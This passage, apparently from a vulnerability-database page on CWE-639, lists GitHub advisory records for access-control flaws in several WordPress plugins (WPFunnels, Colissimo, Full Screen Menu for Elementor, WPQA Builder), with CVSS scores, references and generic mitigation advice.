"database_specific": {
"cwe_ids": [
"CWE-639"
],
"github_reviewed": false,
"github_reviewed_at": null,
"nvd_published_at": "2025-11-08T04:15:45Z",
"severity": "MODERATE"
},
"details": "The WPFunnels \u2013 The Easiest Funnel Builder For WordPress And WooCommerce To Collect Leads And Increase Sales plugin for WordPress is vulnerable to unauthorized user registration in all versions up to, and including, 3.6.2. This is due to the plugin relying on a user controlled value \u0027optin_allow_registration\u0027 to determine if user registration is allowed, instead of the site-specific setting. This makes it possible for unauthenticated attackers to register new user accounts, even when user registration is disabled.",
"id": "GHSA-rxc7-fx8m-jfjp",
"modified": "2025-11-08T06:30:26Z",
"published": "2025-11-08T06:30:26Z",
"references": [
{
"type": "ADVISORY",
"url": "https://nvd.nist.gov/vuln/detail/CVE-2025-12353"
},
{
"type": "WEB",
"url": "https://plugins.trac.wordpress.org/changeset/3389604/wpfunnels/trunk/public/class-wpfnl-public.php"
},
{
"type": "WEB",
"url": "https://www.wordfence.com/threat-intel/vulnerabilities/id/4e376c96-47a8-419f-ab45-f7c46510c767?source=cve"
}
],
"schema_version": "1.4.0",
"severity": [
{
"score": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:L/A:N",
"type": "CVSS_V3"
}
]
}
GHSA-RXH5-G3FX-MMX7
Vulnerability from github – Published: 2026-06-29 15:32 – Updated: 2026-06-29 15:32Unauthenticated Insecure Direct Object References (IDOR) in Colissimo Officiel : Méthodes de livraison pour WooCommerce <= 2.9.0 versions.
{
"affected": [],
"aliases": [
"CVE-2026-57341"
],
"database_specific": {
"cwe_ids": [
"CWE-639"
],
"github_reviewed": false,
"github_reviewed_at": null,
"nvd_published_at": "2026-06-29T15:16:44Z",
"severity": "MODERATE"
},
"details": "Unauthenticated Insecure Direct Object References (IDOR) in Colissimo Officiel : M\u00e9thodes de livraison pour WooCommerce \u003c= 2.9.0 versions.",
"id": "GHSA-rxh5-g3fx-mmx7",
"modified": "2026-06-29T15:32:07Z",
"published": "2026-06-29T15:32:07Z",
"references": [
{
"type": "ADVISORY",
"url": "https://nvd.nist.gov/vuln/detail/CVE-2026-57341"
},
{
"type": "WEB",
"url": "https://patchstack.com/database/wordpress/plugin/colissimo-shipping-methods-for-woocommerce/vulnerability/wordpress-colissimo-officiel-methodes-de-livraison-pour-woocommerce-plugin-2-9-0-insecure-direct-object-references-idor-vulnerability?_s_id=cve"
}
],
"schema_version": "1.4.0",
"severity": [
{
"score": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:L/A:L",
"type": "CVSS_V3"
}
]
}
GHSA-RXM6-RWQJ-RQ6M
Vulnerability from github – Published: 2024-12-21 09:30 – Updated: 2024-12-21 09:30The Full Screen Menu for Elementor plugin for WordPress is vulnerable to Information Exposure in all versions up to, and including, 1.0.7 via the Full Screen Menu Elementor Widget due to insufficient restrictions on which posts can be included. This makes it possible for authenticated attackers, with contributor-level access and above, to extract data from private or draft posts created with Elementor that they should not have access to.
{
"affected": [],
"aliases": [
"CVE-2024-10797"
],
"database_specific": {
"cwe_ids": [
"CWE-639"
],
"github_reviewed": false,
"github_reviewed_at": null,
"nvd_published_at": "2024-12-21T09:15:05Z",
"severity": "MODERATE"
},
"details": "The Full Screen Menu for Elementor plugin for WordPress is vulnerable to Information Exposure in all versions up to, and including, 1.0.7 via the Full Screen Menu Elementor Widget due to insufficient restrictions on which posts can be included. This makes it possible for authenticated attackers, with contributor-level access and above, to extract data from private or draft posts created with Elementor that they should not have access to.",
"id": "GHSA-rxm6-rwqj-rq6m",
"modified": "2024-12-21T09:30:46Z",
"published": "2024-12-21T09:30:46Z",
"references": [
{
"type": "ADVISORY",
"url": "https://nvd.nist.gov/vuln/detail/CVE-2024-10797"
},
{
"type": "WEB",
"url": "https://wordpress.org/plugins/full-screen-menu-for-elementor"
},
{
"type": "WEB",
"url": "https://www.wordfence.com/threat-intel/vulnerabilities/id/feb0f29c-78df-46e6-a6f4-c8548d3e5185?source=cve"
}
],
"schema_version": "1.4.0",
"severity": [
{
"score": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:L/I:N/A:N",
"type": "CVSS_V3"
}
]
}
GHSA-V24X-RP9V-PM6R
Vulnerability from github – Published: 2023-01-10 00:30 – Updated: 2023-01-13 09:30The WPQA Builder WordPress plugin before 5.9.3 (which is a companion plugin used with Discy and Himer WordPress themes) incorrectly tries to validate that a user already follows another in the wpqa_following_you_ajax action, allowing a user to inflate their score on the site by having another user send repeated follow actions to them.
{
"affected": [],
"aliases": [
"CVE-2022-3343"
],
"database_specific": {
"cwe_ids": [
"CWE-639"
],
"github_reviewed": false,
"github_reviewed_at": null,
"nvd_published_at": "2023-01-09T23:15:00Z",
"severity": "LOW"
},
"details": "The WPQA Builder WordPress plugin before 5.9.3 (which is a companion plugin used with Discy and Himer WordPress themes) incorrectly tries to validate that a user already follows another in the wpqa_following_you_ajax action, allowing a user to inflate their score on the site by having another user send repeated follow actions to them.",
"id": "GHSA-v24x-rp9v-pm6r",
"modified": "2023-01-13T09:30:26Z",
"published": "2023-01-10T00:30:26Z",
"references": [
{
"type": "ADVISORY",
"url": "https://nvd.nist.gov/vuln/detail/CVE-2022-3343"
},
{
"type": "WEB",
"url": "https://wpscan.com/vulnerability/e507b1b5-1a56-4b2f-b7e7-e22f6da1e32a"
}
],
"schema_version": "1.4.0",
"severity": [
{
"score": "CVSS:3.1/AV:N/AC:L/PR:L/UI:R/S:U/C:N/I:L/A:N",
"type": "CVSS_V3"
}
]
}
Mitigation
For each and every data access, ensure that the user has sufficient privilege to access the record that is being requested.
Mitigation
Make sure that the key that is used in the lookup of a specific user's record is not controllable externally by the user or that any tampering can be detected.
Mitigation
Use encryption in order to make it more difficult to guess other legitimate values of the key or associate a digital signature with the key so that the server can verify that there has been no tampering.
No CAPEC attack patterns related to this CWE.